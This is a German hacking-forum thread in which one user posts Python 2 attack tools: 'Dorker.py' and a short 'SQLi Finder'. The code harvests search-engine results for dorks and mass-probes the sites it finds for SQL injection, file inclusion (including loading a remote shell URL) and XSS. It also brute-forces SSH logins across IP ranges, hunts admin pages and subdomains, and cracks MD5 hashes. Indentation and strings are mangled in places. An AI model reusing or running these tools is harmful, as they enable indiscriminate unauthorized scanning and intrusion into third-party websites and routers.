Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[Python] Dorker.py

- - - - -

  • Bitte melde dich an um zu Antworten
Eine Antwort in diesem Thema

#1
Cranky

Cranky

    Hacker

  • Banned
  • PIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    68
  • 197 Beiträge
  • 18 Bedankt
  • 655869548
  • Android
  • Linux
Da ich noch wenige posts habe werde ich einfach paar tools posten die ich im alltag nutze. Ich beginn mal beim Dorker script:

#!/usr/bin/env python
import re
import hashlib
import Queue
from random import choice
import threading
import time
import urllib2
import sys
import socket
try:
    import paramiko
    PARAMIKO_IMPORTED = True
except ImportError:
    PARAMIKO_IMPORTED = False
USER_AGENT = ["Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3",
			 "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7",
			 "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
			 "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
			 "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)",
	  "Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/535.38.6 (KHTML, like Gecko) Version/5.1 Safari/535.38.6",
	  "Mozilla/5.0 (Macintosh; U; U; PPC Mac OS X 10_6_7 rv:6.0; en-US) AppleWebKit/532.23.3 (KHTML, like Gecko) Version/4.0.2 Safari/532.23.3"
		    ]
option = ' '
vuln = 0
invuln = 0
np = 0
found = []

class Router(threading.Thread):
    """Checks for routers running ssh with given User/Pass"""
    def __init__(self, queue, user, passw):
	    if not PARAMIKO_IMPORTED:
		    print 'You need paramiko.'
		    print 'http://www.lag.net/paramiko/'
		    sys.exit(1)
	    threading.Thread.__init__(self)	
	    self.queue = queue
	    self.user = user
	    self.passw = passw

    def run(self):
	    """Tries to connect to given Ip on port 22"""
	    ssh = paramiko.SSHClient()
	    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
	    while True:
		    try:
			    ip_add = self.queue.get(False)
		    except Queue.Empty:
			    break
		    try:
			    ssh.connect(ip_add, username = self.user, password = self.passw, timeout = 10)
			    ssh.close()
			    print "Working: %s:22 - %s:%s\n" % (ip_add, self.user, self.passw)
			    write = open('Routers.txt', "a+")
			    write.write('%s:22 %s:%s\n' % (ip_add, self.user, self.passw))
			    write.close() 
			    self.queue.task_done()
		    except:
			    print 'Not Working: %s:22 - %s:%s\n' % (ip_add, self.user, self.passw)
			    self.queue.task_done()
			   
		   
class Ip:
    """Handles the Ip range creation"""
    def __init__(self):
	    self.ip_range = []
	    self.start_ip = raw_input('Start ip: ')
	    self.end_ip = raw_input('End ip: ')
	    self.user = raw_input('User: ')
	    self.passw = raw_input('Password: ')
	    self.iprange()
	  
    def iprange(self):
	    """Creates list of Ip's from Start_Ip to End_Ip"""
	    queue = Queue.Queue()
	    start = list(map(int, self.start_ip.split(".")))
	    end = list(map(int, self.end_ip.split(".")))
	    tmp = start
	  
	    self.ip_range.append(self.start_ip)
	    while tmp != end:
		    start[3] += 1
		    for i in (3, 2, 1):
			    if tmp[i] == 256:
				    tmp[i] = 0
				    tmp[i-1] += 1
		    self.ip_range.append(".".join(map(str, tmp)))
	  
	    for add in self.ip_range:
		    queue.put(add)
	    for i in range(10):
		    thread = Router(queue, self.user, self.passw )
		    thread.setDaemon(True)
		    thread.start()
	    queue.join()

class Crawl:
    """Searches for dorks and grabs results"""
    def __init__(self):
	    if option == '4':
		    self.shell = str(raw_input('Shell location: '))
	    self.dork = raw_input('Enter your dork: ')
	    self.queue = Queue.Queue()
	    self.pages = raw_input('How many pages(Max 20): ')
	    self.qdork = urllib2.quote(self.dork)
	    self.page = 1
	    self.crawler()
  
    def crawler(self):
	    """Crawls Ask.com for sites and sends them to appropriate scan"""
	    print '\nDorking...'
	    for i in range(int(self.pages)):
		    host = "http://uk.ask.com/web?q=%s&page=%s" % (str(self.qdork), self.page)
		    req = urllib2.Request(host)
		    req.add_header('User-Agent', choice(USER_AGENT))
		    response = urllib2.urlopen(req)
		    source = response.read()
		    start = 0
		    count = 1
		    end = len(source)
		    numlinks = source.count('_t" href', start, end)

		    while count < numlinks:
			    start = source.find('_t" href', start, end)
			    end = source.find(' onmousedown="return pk', start,  end)
			    link = source[start+10:end-1].replace("amp;","")
			    self.queue.put(link)
			    start = end
			    end = len(source)
			    count = count + 1
		    self.page += 1
	    if option == '1':
		    for i in range(10):
			    thread = ScanClass(self.queue)
			    thread.setDaemon(True)
			    thread.start()
		    self.queue.join()
	    elif option == '2':
		    for i in range(10):
			    thread = LScanClass(self.queue)
			    thread.setDaemon(True)
			    thread.start()
		    self.queue.join()
	    elif option == '3':
		    for i in range(10):
			    thread = XScanClass(self.queue)
			    thread.setDaemon(True)
			    thread.start()
		    self.queue.join()
	    elif option == '4':
		    for i in range(10):
			    thread = RScanClass(self.queue, self.shell)
			    thread.setDaemon(True)
			    thread.start()
		    self.queue.join()
  
class ScanClass(threading.Thread):
    """Scans for Sql errors and ouputs to file"""
    def __init__(self, queue):
	    threading.Thread.__init__(self)
	    self.queue = queue
	    self.schar = "'"
	    self.file = 'sqli.txt'

    def run(self):
	    """Scans Url for Sql errors"""
	    while True:
		    try:
			    site = self.queue.get(False)
		    except Queue.Empty:
			    break
		    if '=' in site:
			    global vuln
			    global invuln
			    global np
			    test = site + self.schar
			    try:
				    conn = urllib2.Request(test)
				    conn.add_header('User-Agent', choice(USER_AGENT))
				    opener = urllib2.build_opener()
				    data = opener.open(conn).read()
			    except:
				    self.queue.task_done()
			    else:
				    if (re.findall("error in your SQL syntax", data, re.I)):
					    self.mysql(test)
					    vuln += 1
				    elif (re.findall('oracle.jdbc.', data, re.I)):
					    self.mssql(test)
					    vuln += 1
				    elif (re.findall('system.data.oledb', data, re.I)):
					    self.mssql(test)
					    vuln += 1
				    elif (re.findall('SQL command net properly ended', data, re.I)):
					    self.mssql(test)
					    vuln += 1
				    elif (re.findall('atoracle.jdbc.', data, re.I)):
					    self.mssql(test)
					    vuln += 1
				    elif (re.findall('java.sql.sqlexception', data, re.I)):
					    self.mssql(test)
					    vuln += 1
				    elif (re.findall('query failed:', data, re.I)):
					    self.mssql(test)
					    vuln += 1
				    elif (re.findall('postgresql.util.', data, re.I)):
					    self.mssql(test)
					    vuln += 1
				    elif (re.findall('mysql_fetch', data, re.I)):
					    self.mysql(test)
					    vuln += 1
				    elif (re.findall('Error:unknown', data, re.I)):
					    self.mysql(test)
					    vuln += 1
				    elif (re.findall('JET Database Engine', data, re.I)):
					    self.mssql(test)
					    vuln += 1
				    elif (re.findall('Microsoft OLE DB Provider for', data, re.I)):
					    self.mssql(test)
					    vuln += 1
	  elif (re.findall('mysql_numrows', data, re.I)):
					    self.mysql(test)
					    vuln += 1
	  elif (re.findall('mysql_num', data, re.I)):
					    self.mysql(test)
					    vuln += 1
	  elif (re.findall('Invalid Query', data, re.I)):
					    self.mysql(test)
					    vuln += 1
	  elif (re.findall('FetchRow', data, re.I)):
					    self.mysql(test)
					    vuln += 1
				    elif (re.findall('JET Database', data, re.I)):
					    self.mssql(test)
					    vuln += 1
				    elif (re.findall('OLE DB Provider for', data, re.I)):
					    self.mssql(test)
					    vuln += 1
				    elif (re.findall('Syntax error', data, re.I)):
					    self.mssql(test)
					    vuln += 1
				    else:
					    print B+test + W+' <-- Not Vuln'
					    invuln += 1
		    else:
			    print R+site + W+' <-- No Parameters'
			    np += 1
		    self.queue.task_done()

    def mysql(self, url):
	    """Proccesses vuln sites into text file and outputs to screen"""
	    read = open(self.file, "a+").read()
	    if url in read:
		    print G+'Dupe: ' + W+url
	    else:
		    print O+"MySql: " + url + W
		    write = open(self.file, "a+")
		    write.write('[SQLI]: ' + url + "\n")
		    write.close()
    def mssql(self, url):
	    """Proccesses vuln sites into text file and outputs to screen"""
	    read = open(self.file).read()
	    if url in read:
		    print G+'Dupe: ' + url + W
	    else:
		    print O+"MsSql: " + url + W
	 write = open (self.file, "a+")
		    write.write('[SQLI]: ' + url + "\n")
		    write.close()  

class LScanClass(threading.Thread):
    """Scans for Lfi errors and outputs to file"""
    def __init__(self, queue):
	    threading.Thread.__init__(self)
	    self.file = 'lfi.txt'
	    self.queue = queue
	    self.lchar = '../'
	  
    def run(self):
	    """Checks Url for File Inclusion errors"""
	    while True:
		    try:
			    site = self.queue.get(False)
		    except Queue.Empty:
			    break
		    if '=' in site:
			    lsite = site.rsplit('=', 1)[0]
			    if lsite[-1] != "=":
				    lsite = lsite + "="
			    test = lsite + self.lchar
			    global vuln
			    global invuln
			    global np
			    try:
				    conn = urllib2.Request(test)
				    conn.add_header('User-Agent', choice(USER_AGENT))
				    opener = urllib2.build_opener()
				    data = opener.open(conn).read()
			    except:
				    self.queue.task_done()
			    else:
				    if (re.findall("failed to open stream: No such file or directory", data, re.I)):
					    self.lfi(test)
					    vuln += 1
				    else:
					    print B+test + W+' <-- Not Vuln'
					    invuln += 1
		    else:
			    print R+site + W+' <-- No Parameters'
			    np += 1 
		    self.queue.task_done()

    def lfi(self, url):
	    """Proccesses vuln sites into text file and outputs to screen"""
	    read = open(self.file, "a+").read()
	    if url in read:
		    print G+'Dupe: ' + url + W
	    else:
		    print O+"Lfi: " + url + W
		    write = open(self.file, "a+")
		    write.write('[LFI]: ' + url + "\n")
		    write.close()	 

class XScanClass(threading.Thread):
    """Scan for Xss errors and outputs to file"""
    def __init__(self, queue):
	    threading.Thread.__init__(self)
	    self.queue = queue
	    self.xchar = """<ScRIpT>alert('xssBYCranky');</ScRiPt>"""
	    self.file = 'xss.txt'

    def run(self):
	    """Checks Url for possible Xss"""
	    while True:
		    try:
			    site = self.queue.get(False)
		    except Queue.Empty:
			    break
		    if '=' in site:
			    global vuln
			    global invuln
			    global np
			    xsite = site.rsplit('=', 1)[0]
			    if xsite[-1] != "=":
				    xsite = xsite + "="
			    test = xsite + self.xchar
			    try:
				    conn = urllib2.Request(test)
				    conn.add_header('User-Agent', choice(USER_AGENT))
				    opener = urllib2.build_opener()
				    data = opener.open(conn).read()
			    except:
				    self.queue.task_done()
			    else:
				    if (re.findall("xssBYCranky", data, re.I)):
					    self.xss(test)
					    vuln += 1
				    else:
					    print B+test + W+' <-- Not Vuln'
					    invuln += 1
		    else:
			    print R+site + W+' <-- No Parameters'
			    np += 1
		    self.queue.task_done()

    def xss(self, url):
	    """Proccesses vuln sites into text file and outputs to screen"""
	    read = open(self.file, "a+").read()
	    if url in read:
		    print G+'Dupe: ' + url + W
	    else:
		    print O+"Xss: " + url + W
		    write = open(self.file, "a+")
		    write.write('[XSS]: ' + url + "\n")
		    write.close()  

class RScanClass(threading.Thread):
    """Scans for Rfi errors and outputs to file"""
    def __init__(self, queue, shell):
	    threading.Thread.__init__(self)
	    self.queue = queue
	    self.file = 'rfi.txt'
	    self.shell = shell

    def run(self):
	    """Checks Url for Remote File Inclusion vulnerability"""
	    while True:
		    try:
			    site = self.queue.get(False)
		    except Queue.Empty:
			    break
		    if '=' in site:
			    global vuln
			    global invuln
			    global np
			    rsite = site.rsplit('=', 1)[0]
			    if rsite[-1] != "=":
				    rsite = rsite + "="
			    link = rsite + self.shell + '?'
			    try:
				    conn = urllib2.Request(link)
				    conn.add_header('User-Agent', choice(USER_AGENT))
				    opener = urllib2.build_opener()
				    data = opener.open(conn).read()
			    except:
				    self.queue.task_done()
			    else:
				    if (re.findall('uname -a', data, re.I)):
					    self.rfi(link)
					    vuln += 1
				    else:
					    print B+link + W+' <-- Not Vuln'
					    invuln += 1
		    else:
			    print R+site + W+' <-- No Parameters'
			    np += 1	   
		    self.queue.task_done()
  
    def rfi(self, url):
	    """Proccesses vuln sites into text file and outputs to screen"""
	    read = open(self.file, "a+").read()
	    if url in read:
		    print G+'Dupe: ' + url + W
	    else:
		    print O+"Rfi: " + url + W
		    write = open(self.file, "a+")
		    write.write('[Rfi]: ' + url + "\n")
		    write.close()	  

class Atest(threading.Thread):
    """Checks given site for Admin Pages/Dirs"""
    def __init__(self, queue):
	    threading.Thread.__init__(self)
	    self.queue = queue

    def run(self):
	    """Checks if Admin Page/Dir exists"""
	    while True:
		    try:
			    site = self.queue.get(False)
		    except Queue.Empty:
			    break
		    try:
			    conn = urllib2.Request(site)
			    conn.add_header('User-Agent', choice(USER_AGENT))
			    opener = urllib2.build_opener()
			    opener.open(conn)
			    print site
			    found.append(site)
			    self.queue.task_done()
  
		    except urllib2.URLError:
			    self.queue.task_done()

def admin():
    """Create queue and threads for admin page scans"""
    print 'Need to include http:// and ending /\n'
    site = raw_input('Site: ')
    queue  = Queue.Queue()
    dirs = ['admin.php', 'admin/', 'en/admin/', 'administrator/', 'moderator/', 'webadmin/', 'adminarea/', 'bb-admin/', 'adminLogin/', 'admin_area/', 'panel-administracion/', 'instadmin/',
		    'memberadmin/', 'administratorlogin/', 'adm/', 'admin/account.php', 'admin/index.php', 'admin/login.php', 'admin/admin.php', 'admin/account.php',
		    'joomla/administrator', 'login.php', 'admin_area/admin.php' ,'admin_area/login.php' ,'siteadmin/login.php' ,'siteadmin/index.php', 'siteadmin/login.html',
		    'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/admin.html', 'admin_area/index.php', 'bb-admin/index.php', 'bb-admin/login.php',
		    'bb-admin/admin.php', 'admin/home.php', 'admin_area/login.html', 'admin_area/index.html', 'admin/controlpanel.php', 'admincp/index.asp', 'admincp/login.asp',
		    'admincp/index.html', 'admin/account.html', 'adminpanel.html', 'webadmin.html', 'webadmin/index.html', 'webadmin/admin.html', 'webadmin/login.html',
		    'admin/admin_login.html', 'admin_login.html', 'panel-administracion/login.html', 'admin/cp.php', 'cp.php', 'administrator/index.php', 'cms', 'administrator/login.php',
		    'nsw/admin/login.php', 'webadmin/login.php', 'admin/admin_login.php', 'admin_login.php', 'administrator/account.php' ,'administrator.php', 'admin_area/admin.html',
		    'pages/admin/admin-login.php' ,'admin/admin-login.php', 'admin-login.php', 'bb-admin/index.html', 'bb-admin/login.html', 'bb-admin/admin.html', 'admin/home.html',
		    'modelsearch/login.php', 'moderator.php', 'moderator/login.php', 'moderator/admin.php', 'account.php', 'pages/admin/admin-login.html', 'admin/admin-login.html',
		    'admin-login.html', 'controlpanel.php', 'admincontrol.php', 'admin/adminLogin.html' ,'adminLogin.html', 'admin/adminLogin.html', 'home.html',
		    'rcjakar/admin/login.php', 'adminarea/index.html', 'adminarea/admin.html', 'webadmin.php', 'webadmin/index.php', 'webadmin/admin.php', 'admin/controlpanel.html',
		    'admin.html', 'admin/cp.html', 'cp.html', 'adminpanel.php', 'moderator.html', 'administrator/index.html', 'administrator/login.html', 'user.html',
		    'administrator/account.html', 'administrator.html', 'login.html', 'modelsearch/login.html', 'moderator/login.html', 'adminarea/login.html',
		    'panel-administracion/index.html', 'panel-administracion/admin.html', 'modelsearch/index.html', 'modelsearch/admin.html', 'admincontrol/login.html',
		    'adm/index.html', 'adm.html', 'moderator/admin.html', 'user.php', 'account.html', 'controlpanel.html', 'admincontrol.html', 'panel-administracion/login.php',
		    'wp-login.php', 'wp-admin', 'typo3', 'adminLogin.php', 'admin/adminLogin.php', 'home.php','adminarea/index.php' ,'adminarea/admin.php' ,'adminarea/login.php',
		    'panel-administracion/index.php', 'panel-administracion/admin.php', 'modelsearch/index.php', 'modelsearch/admin.php', 'admincontrol/login.php',
		    'adm/admloginuser.php', 'admloginuser.php', 'admin2.php', 'admin2/login.php', 'admin2/index.php', 'adm/index.php', 'adm.php', 'affiliate.php','admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
   
    for add in dirs:
	    test = site + add
	    queue.put(test)
	   
    for i in range(20):
	    thread = Atest(queue)
	    thread.setDaemon(True)
	    thread.start()
    queue.join()
def aprint():
    """Print results of admin page scans"""
    print 'Search Finished\n'
    if len(found) == 0:
	    print 'No pages found'
    else:
	    for site in found:
		    print O+'Found: ' + G+site + W
	  
class SDtest(threading.Thread):
    """Checks given Domain for Sub Domains"""
    def __init__(self, queue):
	    threading.Thread.__init__(self)
	    self.queue = queue

    def run(self):
	    """Checks if Sub Domain responds"""
	    while True:
		    try:
			    domain = self.queue.get(False)
		    except Queue.Empty:
			    break
		    try:
			    site = 'http://' + domain
			    conn = urllib2.Request(site)
			    conn.add_header('User-Agent', choice(USER_AGENT))
			    opener = urllib2.build_opener()
			    opener.open(conn)
		    except urllib2.URLError:
			    self.queue.task_done()
		    else:
			    target = socket.gethostbyname(domain) 
			    print 'Found: ' + site + ' - ' + target
			    self.queue.task_done()	   
def subd():
    """Create queue and threads for sub domain scans"""
    queue = Queue.Queue()
    site = raw_input('Domain: ')
    sub = ["admin", "access", "accounting", "accounts", "admin", "administrator", "aix", "ap", "archivos", "aula", "aulas", "ayuda", "backup", "backups", "bart", "bd", "beta", "biblioteca",
		    "billing", "blackboard", "blog", "blogs", "bsd", "cart", "catalog", "catalogo", "catalogue", "chat", "chimera", "citrix", "classroom", "clientes", "clients", "carro",
		    "connect", "controller", "correoweb", "cpanel", "csg", "customers", "db", "dbs", "demo", "demon", "demostration", "descargas", "developers", "development", "diana",
		    "directory", "dmz", "domain", "domaincontroller", "download", "downloads", "ds", "eaccess", "ejemplo", "ejemplos", "email", "enrutador", "example", "examples", "exchange",
		    "eventos", "events", "extranet", "files", "finance", "firewall", "foro", "foros", "forum", "forums", "ftp", "ftpd", "fw", "galeria", "gallery", "gateway", "gilford",
		    "groups", "groupwise", "guia", "guide", "gw", "help", "helpdesk", "hera", "heracles", "hercules", "home", "homer", "hotspot", "hypernova", "images", "imap", "imap3", "imap3d",
		    "imapd", "imaps", "imgs", "imogen", "inmuebles", "internal", "intranet", "ipsec", "irc", "ircd", "jabber", "laboratorio", "lab", "laboratories", "labs", "library", "linux", "lisa",  "login", "logs", "mail", "mailgate", "manager", "marketing", "members", "mercury", "meta", "meta01", "meta02", "meta03", "miembros", "minerva", "mob", "mobile", "moodle", "movil",
		    "mssql", "mx", "mx0", "mx1", "mx2", "mx3", "mysql", "nelson", "neon", "netmail", "news", "novell", "ns", "ns0", "ns1", "ns2", "ns3", "online", "oracle", "owa", "partners", "pcanywhere",
		    "pegasus", "pendrell", "personal", "photo", "photos", "pop", "pop3", "portal", "postman", "postmaster", "private", "proxy", "prueba", "pruebas", "public", "ras", "remote", "reports", "research",
		    "restricted", "robinhood", "router", "rtr", "sales", "sample", "samples", "sandbox", "search", "secure", "seguro", "server", "services", "servicios", "servidor", "shop", "shopping",
		    "smtp", "socios", "soporte", "squirrel", "squirrelmail", "ssh", "staff", "sms", "solaris", "sql", "stats", "sun", "support", "test", "tftp", "tienda", "unix", "upload", "uploads",
		    "ventas", "virtual", "vista", "vnc", "vpn", "vpn1", "vpn2", "vpn3", "wap", "web1", "web2", "web3", "webct", "webadmin", "webmail", "webmaster", "win", "windows", "www", "ww0", "ww1",
		    "ww2", "ww3", "www0", "www1", "www2", "www3", "xanthus", "zeus"]
    for check in sub:
	    test = check + '.' + site
	    queue.put(test)
	   
    for i in range(20):
	    thread = SDtest(queue)
	    thread.setDaemon(True)
	    thread.start()
    queue.join()

class Cracker(threading.Thread):
    """Use a wordlist to try and brute the hash"""
    def __init__(self, queue, hashm):
	    threading.Thread.__init__(self)
	    self.queue = queue
	    self.hashm = hashm
    def run(self):
	    """Hash word and check against hash"""
	    while True:
		    try:
			    word = self.queue.get(False)
		    except Queue.Empty:
			    break
		    tmp = hashlib.md5(word).hexdigest()
		    if tmp == self.hashm:
			    self.result(word)  
		    self.queue.task_done()
    def result(self, words):
	    """Print result if found"""
	    print self.hashm + ' = ' + words
def word():
    """Create queue and threads for hash crack"""
    queue = Queue.Queue()
    wordlist = raw_input('Wordlist: ')
    hashm = raw_input('Enter Md5 hash: ')
    read = open(wordlist)
    for words in read:
	    words = words.replace("\n","")
	    queue.put(words)	  
    read.close()
    for i in range(5):
	    thread = Cracker(queue, hashm)
	    thread.setDaemon(True)
	    thread.start()
    queue.join()

class OnlineCrack:
    """Use online service to check for hash"""
    def crack(self):
	    """Connect and check hash"""
	    hashm = raw_input('Enter MD5 Hash: ')
	    conn = urllib2.Request('http://md5.hashcracking.com/search.php?md5=%s' % (hashm))
	    conn.add_header('User-Agent', choice(USER_AGENT))
	    opener = urllib2.build_opener()
	    opener.open(conn)
	    data = opener.open(conn).read()
	    if data == 'No results returned.':
		    print '\n- Not found or not valid -'
	    else:
		    print '\n- %s -' % (data)

class Check:
    """Check your current IP address"""
    def grab(self):
	    """Connect to site and grab IP"""
	    site = 'http://www.tracemyip.org/'
	    try:
		    conn = urllib2.Request(site)
		    conn.add_header('User-Agent', choice(USER_AGENT))
		    opener = urllib2.build_opener()
		    opener.open(conn)
		    data = opener.open(conn).read() 
		    start = 0
		    end = len(data)	
		    start = data.find('onclick="', start, end)
		    end = data.find('size=', start, end)  
		    ip_add = data[start+46:end-2].strip()
		    print '\nYour current Ip address is %s' % (ip_add)
	   
	    except urllib2.HTTPError:
		    print 'Error connecting'
   
def output():
    """Outputs dork scan results to screen"""
    print '\n>> ' + str(vuln) + G+' Vulnerable Sites Found' + W
    print '>> ' + str(invuln) + G+' Sites Not Vulnerable' + W
    print '>> ' + str(np) + R+' Sites Without Parameters' + W
    if option == '1':
	    print '>> Output Saved To sqli.txt\n'
    elif option == '2':
	    print '>> Output Saved To lfi.txt'
    elif option == '3':
	    print '>> Output Saved To xss.txt'
    elif option == '4':
	    print '>> Output Saved To rfi.txt' 

W  = "\033[0m"; 
R  = "\033[31m";
G  = "\033[32m";
O  = "\033[33m";
B  = "\033[34m";
def main():
    """Outputs Menu and gets input"""
    quotes = [
'\nprohexuh@gmail.com\n'
	    ]
    print (O+'''
-------------
-- Dorker --
--- v1.5 ----
---- by -----
--- Cranky ----
-------------''')
    print (G+'''
-[1]-  SQLi
-[2]-  LFI
-[3]-  XSS
-[4]-  RFI
-[5]-  Proxy
-[6]-  Admin Page Finder
-[7]-  Sub Domain Scan
-[8]-  Dictionary MD5 cracker
-[9]-  Online MD5 cracker
-[10]- Check your IP address''')
    print (B+'''
-[!]- If freeze while running or want to quit,
just Ctrl C, it will automatically terminate the job.
''')
    print W
    global option
    option = raw_input('Enter Option: ')

    if option:
	    if option == '1':
		    Crawl()
		    output()
		    print choice(quotes)
		   
	    elif option == '2':
		    Crawl()
		    output()
		    print choice(quotes)

	    elif option == '3':
		    Crawl()
		    output()
		    print choice(quotes)

	    elif option == '4':
		    Crawl()
		    output()
		    print choice(quotes)
	
	    elif option == '5':
		    Ip()
		    print choice(quotes)

	    elif option == '6':
		    admin()
		    aprint()
		    print choice(quotes)
	    elif option == '7':
		    subd()
		    print choice(quotes)
	    elif option == '8':
		    word()
		    print choice(quotes) 
	    elif option == '9':
		    OnlineCrack().crack()
		    print choice(quotes)
				 
	    elif option == '10':
		    Check().grab() 
		    print choice(quotes)	  
	    else:
		    print R+'\nInvalid Choice\n' + W
		    time.sleep(0.9)
		    main()   

    else:
	    print R+'\nYou Must Enter An Option (Check if your typo is corrected.)\n' + W
	    time.sleep(0.9)
	    main()


if __name__ == '__main__':
    main()

Ich "hacke" keine whatsapp oder facebook accounts aber schreibt mich ruhig an was das betrifft dann hab ich was zu lachen. :D

 

 


#2
Cranky

Cranky

    Hacker

  • Banned
  • PIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    68
  • 197 Beiträge
  • 18 Bedankt
  • 655869548
  • Android
  • Linux

import urllib2

import os

import re

import httplib

from time import sleep

if os.name == 'nt':

os.system('cls') # Windows

else:

os.system('clear') # Linux

def welcome():



print'''

  |=======================================================|

  |=================  [ ProHex ]   =======================|

  |============    [ prohexuh@gmail.com ]    =============|

  |===[ http://www.ioscoderz.com - iOSCoderz - Coding ]===|

  |=======================================================|

  |			    SQLi Finder by ProHex				  |

  |=======================================================|

  '''

print "[1] From Google n"

print "[2] From Bing n"

print "[3] From Ip n"

file=open('lol.txt','w')

file1=open('lol.txt','r')

def getsitesgoogle():

dork=raw_input("dork : ")

start=0

end=490

sleep(3)

print "Getting Websites From google ... "

while start<=end :

  con = urllib2.urlopen('http://startgoogle.startpagina.nl/index.php?start='+str(start)+'&q='+dork)

  readd=con.read()

  find=re.findall('<a href="(.*)" target="_self" onclick="',readd)

  start = start+10

  for i in range(len(find)):

   rez=find[i]+"'"

   file.write(rez + 'n')

   os.system('exit')

  

  

  

def getsitesbing():

dork=raw_input("dork : ")

start=0

end=200

sleep(3)

print "Getting Websites From Bing ... "

while start<=end :

  con = urllib2.urlopen('http://www.bing.com/search?q='+dork+"&first="+str(start))

  readd=con.read()

  find=re.findall('<div class="sb_tlst"><h3><a href="(.*?)" h=',readd)

  start = start+10

  for i in range(len(find)):

   rez=find[i]+"'"

   file.write(rez + 'n')

   os.system('exit')

def findsql():

file2=open("rez.txt",'a')

domains=file1.read().split()

print "Scaning Websites From sql Injection ... "

for domaine in domains :

   try:

    conn = urllib2.urlopen(domaine)

    readd=conn.read()

    findd=re.findall('/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i|You have an error in your SQL syntax|Microsoft VBScript runtime error',readd)

    if(findd):

	 print "Sql FOund=>"+domaine+("n")

	 file2.write(domaine+("n"))

    else:

print "Not FOund =>"+domaine+("n")

 

   except IOError:

    print "Error"



